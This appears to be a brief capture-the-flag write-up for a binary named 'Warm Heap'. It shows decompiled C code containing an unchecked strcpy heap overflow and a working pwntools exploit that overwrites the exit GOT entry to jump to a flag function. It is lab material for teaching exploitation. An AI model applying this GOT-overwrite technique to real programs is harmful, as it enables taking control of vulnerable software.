Warm Heap

Warm Heap

Binary File

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
{
void *v3; // ST10_8
void *v4; // ST18_8
char s; // [rsp+20h] [rbp-1010h]
unsigned __int64 v6; // [rsp+1028h] [rbp-8h]

v6 = __readfsqword(0x28u);
v3 = malloc(16uLL);
*(_DWORD *)v3 = 1;
*((_QWORD *)v3 + 1) = malloc(8uLL);
v4 = malloc(16uLL);
*(_DWORD *)v4 = 2;
*((_QWORD *)v4 + 1) = malloc(8uLL);
fgets(&s, 4096, stdin);
strcpy(*((char **)v3 + 1), &s);
fgets(&s, 4096, stdin);
strcpy(*((char **)v4 + 1), &s);
exit(0);
}

[메인 함수]
[동작 과정]
1
2
3
4
5
6
7
8
9
10
from pwn import *

r = process('./warm_heap.bin')
elf = ELF('./warm_heap.bin')
flag = 0x400826
exit_got = 0x601068d

payload = "A"*40 + p64(elf.got['exit']) + "\n" + p64(flag)
r.sendline(payload)
r.interactive()
[Exploit Code]

공유하기